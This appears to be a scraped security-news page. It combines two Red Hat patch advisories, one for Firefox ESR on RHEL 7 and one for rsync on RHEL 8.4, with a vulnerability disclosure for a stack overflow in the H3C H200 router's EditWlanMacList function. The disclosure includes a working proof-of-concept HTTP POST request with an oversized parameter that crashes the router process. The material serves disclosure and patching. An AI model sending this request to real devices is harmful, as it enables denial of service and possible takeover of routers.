iQIVAwUBYwa9itzjgjWX9erEAQgzqA//UIEomuMcszc2TKyhbjld5uncoA8DEnPG  
C41AZJy/6PhvluFwEx2+i7MWdpLooqCohtcgm842bA5rYKSyBNHgYxSm9eoWO8se  
unpPuRULYqTyTYbciaciH3jtpMx7/qYNtFOHz7uakJhaG2l1eas9ix3WyECHZ61O  
FRgjEFpKpol/5iKzN8V4bEuuQ4f36AVyQY474CXKK4HwswOrDwoY9y6OLs1KIZKV  
ZlRXTVQdWqqOwEguAd8waPZZbTE8jSuPq0+Cz1G1r1L/OH8hdgVc9qP0NquSdGx4  
DYE0HOFa0cAdWBb2yyDtNGfrjhvywqLJAG73Myopo8YKDELvaUOVBIN0NQxkf+CE  
Qzdt9yR6Y+j30sfAx4HwNMqGyg6yjhTbvms3apzNcz1zevJA6CJd7JxlWximPeWf  
6ROc8BaumkRkYB+mxmGOFlwJO+zGJXNO6d3ddTB9arRb3VJILl3GR8+TWb3wXwvZ  
Zn4WX8aOI/b6HBBEUucz+PhoRc8zS8FqfJcpj7tRks8XwZ4Yws09D2eWJCLpCXsq  
DR+CRcOquxWio0zwAU9+SDIB5XY2I2j7FHNK0a4Vt2uJu7Opb8cmcwr76wwqBdbl  
FZeagxcBO72Xt/XdbKivilWJqqHehQmftLMD/5pf+ETDYm50NyOA8tW/1IbV62tV  
b6ZsEl1S/y0=dI37  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6168-01

Red Hat Security Advisory 2022-6179-01 - Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability. This update upgrades Firefox to version 91.13.0 ESR. Issues addressed include spoofing and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: firefox security update  
Advisory ID:       RHSA-2022:6179-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6179  
Issue date:        2022-08-24  
CVE Names:         CVE-2022-38472 CVE-2022-38473 CVE-2022-38476  
                   CVE-2022-38477 CVE-2022-38478  
====================================================================  
1. Summary:

An update for firefox is now available for Red Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Client (v. 7) - x86_64  
Red Hat Enterprise Linux Client Optional (v. 7) - x86_64  
Red Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux Server Optional (v. 7) - x86_64  
Red Hat Enterprise Linux Workstation (v. 7) - x86_64  
Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64

3. Description:

Mozilla Firefox is an open-source web browser, designed for standards  
compliance, performance, and portability.

This update upgrades Firefox to version 91.13.0 ESR.

Security Fix(es):

* Mozilla: Address bar spoofing via XSLT error handling (CVE-2022-38472)

* Mozilla: Cross-origin XSLT Documents would have inherited the parent's  
permissions (CVE-2022-38473)

* Mozilla: Memory safety bugs fixed in Firefox 104 and Firefox ESR 102.2  
(CVE-2022-38477)

* Mozilla: Memory safety bugs fixed in Firefox 104, Firefox ESR 102.2, and  
Firefox ESR 91.13 (CVE-2022-38478)

* Mozilla: Data race and potential use-after-free in PK11_ChangePW  
(CVE-2022-38476)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the update, Firefox must be restarted for the changes to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2120673 - CVE-2022-38472 Mozilla: Address bar spoofing via XSLT error handling  
2120674 - CVE-2022-38473 Mozilla: Cross-origin XSLT Documents would have inherited the parent's permissions  
2120678 - CVE-2022-38476 Mozilla: Data race and potential use-after-free in PK11_ChangePW  
2120695 - CVE-2022-38477 Mozilla: Memory safety bugs fixed in Firefox 104 and Firefox ESR 102.2  
2120696 - CVE-2022-38478 Mozilla: Memory safety bugs fixed in Firefox 104, Firefox ESR 102.2, and Firefox ESR 91.13

6. Package List:

Red Hat Enterprise Linux Client (v. 7):

Source:  
firefox-91.13.0-1.el7_9.src.rpm

x86_64:  
firefox-91.13.0-1.el7_9.x86_64.rpm  
firefox-debuginfo-91.13.0-1.el7_9.x86_64.rpm

Red Hat Enterprise Linux Client Optional (v. 7):

x86_64:  
firefox-91.13.0-1.el7_9.i686.rpm

Red Hat Enterprise Linux Server (v. 7):

Source:  
firefox-91.13.0-1.el7_9.src.rpm

ppc64:  
firefox-91.13.0-1.el7_9.ppc64.rpm  
firefox-debuginfo-91.13.0-1.el7_9.ppc64.rpm

ppc64le:  
firefox-91.13.0-1.el7_9.ppc64le.rpm  
firefox-debuginfo-91.13.0-1.el7_9.ppc64le.rpm

s390x:  
firefox-91.13.0-1.el7_9.s390x.rpm  
firefox-debuginfo-91.13.0-1.el7_9.s390x.rpm

x86_64:  
firefox-91.13.0-1.el7_9.x86_64.rpm  
firefox-debuginfo-91.13.0-1.el7_9.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 7):

x86_64:  
firefox-91.13.0-1.el7_9.i686.rpm

Red Hat Enterprise Linux Workstation (v. 7):

Source:  
firefox-91.13.0-1.el7_9.src.rpm

x86_64:  
firefox-91.13.0-1.el7_9.x86_64.rpm  
firefox-debuginfo-91.13.0-1.el7_9.x86_64.rpm

Red Hat Enterprise Linux Workstation Optional (v. 7):

x86_64:  
firefox-91.13.0-1.el7_9.i686.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-38472  
https://access.redhat.com/security/cve/CVE-2022-38473  
https://access.redhat.com/security/cve/CVE-2022-38476  
https://access.redhat.com/security/cve/CVE-2022-38477  
https://access.redhat.com/security/cve/CVE-2022-38478  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYwa9pNzjgjWX9erEAQinNw/+NHSbkj9VrFukzXAWq7KU90onZSSTu9kh  
CMdgRVazfVBWicDqzN94kfU5TEUvx6gDxqF9jF1q7tKDP0qabS1IIVl7MosTNwY8  
ruGy0czv31Xu30mQT3TGUDvnk08k3mkNUbqfdPgsinMxiLH1HV/8soeuHHsGC7fP  
KCwPSGrMkSUoYhyvaVKEHSLhNWIWI79nbuMpG6akTrrXY3F1aq8Ebq3XkTesbEqS  
Zgeh2GrNXHQH6B4RG+JpzVulb7LR2LmAmYmQLQViroCybQLS51GcnHuIFZQ2TyFW  
4aXU2/MIbTLX9mgmKv/B5+2FER0DJHkOOEWig8hu2hf2CBjuqbV34+iQCCClSzeN  
3hivzFjbOmEUu/ya8y66WKUmQDJ78d4PT0P7seNxe9JEjvmNtd6f4mttvTp8adPN  
TWKKFvN3NEiYUC/y/0+FFmw6W24NrnBsovmLVOBr/WZYP17yxIAe3+XdfhtTQCW9  
KSJsydd9hm6BOQmjEIF6TupAzRdl9uCR0IGYy39+UnsUSjl+xSiD8CFgaOTRRxbi  
bWO/k63kGBgRC21hXawneSrTFkBrjK5DMW8QuA/0UFBrLjcKjVjl3wMvt/pRLX98  
uG5YGjMM5GU34OG8XbAfYD1eL9xva5eBt82wAGN6FQHIynXDszKwp50nW3pRf5oN  
wyiI5BM/0AgW+I  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6179-01

Red Hat Security Advisory 2022-6171-01 - The rsync utility enables the users to copy and synchronize files locally or across a network. Synchronization with rsync is fast because rsync only sends the differences in files over the network instead of sending whole files. The rsync utility is also used as a mirroring tool.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: rsync security update  
Advisory ID:       RHSA-2022:6171-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6171  
Issue date:        2022-08-24  
CVE Names:         CVE-2022-29154  
====================================================================  
1. Summary:

An update for rsync is now available for Red Hat Enterprise Linux 8.4  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux BaseOS EUS (v.8.4) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

The rsync utility enables the users to copy and synchronize files locally  
or across a network. Synchronization with rsync is fast because rsync only  
sends the differences in files over the network instead of sending whole  
files. The rsync utility is also used as a mirroring tool.

Security Fix(es):

* rsync: remote arbitrary files write inside the directories of connecting  
peers (CVE-2022-29154)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2110928 - CVE-2022-29154 rsync: remote arbitrary files write inside the directories of connecting peers

6. Package List:

Red Hat Enterprise Linux BaseOS EUS (v.8.4):

Source:  
rsync-3.1.3-12.el8_4.2.src.rpm

aarch64:  
rsync-3.1.3-12.el8_4.2.aarch64.rpm  
rsync-debuginfo-3.1.3-12.el8_4.2.aarch64.rpm  
rsync-debugsource-3.1.3-12.el8_4.2.aarch64.rpm

noarch:  
rsync-daemon-3.1.3-12.el8_4.2.noarch.rpm

ppc64le:  
rsync-3.1.3-12.el8_4.2.ppc64le.rpm  
rsync-debuginfo-3.1.3-12.el8_4.2.ppc64le.rpm  
rsync-debugsource-3.1.3-12.el8_4.2.ppc64le.rpm

s390x:  
rsync-3.1.3-12.el8_4.2.s390x.rpm  
rsync-debuginfo-3.1.3-12.el8_4.2.s390x.rpm  
rsync-debugsource-3.1.3-12.el8_4.2.s390x.rpm

x86_64:  
rsync-3.1.3-12.el8_4.2.x86_64.rpm  
rsync-debuginfo-3.1.3-12.el8_4.2.x86_64.rpm  
rsync-debugsource-3.1.3-12.el8_4.2.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-29154  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYwa9c9zjgjWX9erEAQj0Fw/9FhdSDbGUwpB45PzBPxtsoEMowDW1wPh1  
Oxe0OdniOteew1ss2J44ptNIFLEj2f3xSnnCbOLJnOdc0YMQhUo4Xin9UPolTo/h  
OOI5YVvd05GkfTLZ2cMT6Wp0nGUKa4XjkipQgu70tKXEgZpOa5F00XR7okdYhURK  
j8F8L8LDLIpESqBlXPMKAeCAnVQLcwoJP7xibgBajYFQMZrv66H6diX9ahPra861  
ZbiAi+qCBK9ubu15tLOPWTjyiIXjFsl3WJqoj/fwSfHH4xrw63UJDIxl96PmhI8/  
uFSbL+ybq/EHrWatPn1yhg0LOK5IVvYYGh6KHf+biKR8CHWLOr0Mzq/OfSkMh3+S  
JTjFDFZnZ7H7orzsOHo1gdhk1qVcpBrPfFxUAbhoycuDM1b+ntRyjL4il2Y91+88  
1LLE+O5/EhHeOzyjwf9ZLIJbxAdNmWy7FwXLqqQIQ+7HcDVtcaiVbvD1CSdldxvY  
wD6k21hF6DTK1J4Y4IVdMkOl1r3muFOj3PNdCYd9YOOU4/QVo0Tx8uIlJSlELttd  
G1AtMZHW3jNmedGZWvn6Nz5WW1T7MK5KvbF38IcPDkvOpfpUR43+lk8w7dUuskLo  
ujsCjsF/45qYr/64XlPXWtzsZpybicKuGav2OQxDh5GBTcuhKrcXP8ch4jJhRNYR  
QtwEciwTZWo=7Ras  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6171-01

H3C H200 H200V100R004 was discovered to contain a stack overflow via the function EditWlanMacList.

**H3C H200\[H200-EI\] (H200V100R004) has a stack overflow vulnerability****Overview**

*   Manufacturer's website information：https://www.h3c.com/
*   Firmware download address ： https://www.h3c.com/cn/d\_202009/1345678\_30005\_0.htm

**Product Information**

H3C H200\[H200-EI\] H200V100R004, the latest version of simulation overview：

**Vulnerability details**

The H3C H200\[H200-EI\] (H200V100R004) was found to have a stack overflow vulnerability in the EditWlanMacList function. An attacker can obtain a stable root shell through a carefully constructed payload.

In the EditWlanMacList function,the param we entered is formatted using the sscanf function and in the form of %u;%[^;];%[^;];. This greedy matching mechanism is not secure, as long as the size of the data we enter is larger than the size of V5 or V13, it will cause a stack overflow.

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    POST /goform/aspForm HTTP/1.1
    Host: 192.168.0.124:80
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Referer: https://121.226.152.63:8443/router_password_mobile.asp
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 553
    Origin: https://192.168.0.124:80
    DNT: 1
    Connection: close
    Cookie: JSESSIONID=5c31d502
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: same-origin
    Sec-Fetch-User: ?1
    
    CMD=EditWlanMacList&param=1;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA;
    

The picture above shows the process information before we send poc.

In the picture above, we can see that the PID has changed since we sent the POC.

The picture above is the log information.

By calculating offsets, we can compile special data to refer to denial-of-service attacks(DOS).

Finally, you also can write exp to get a stable root shell.

Tag

#js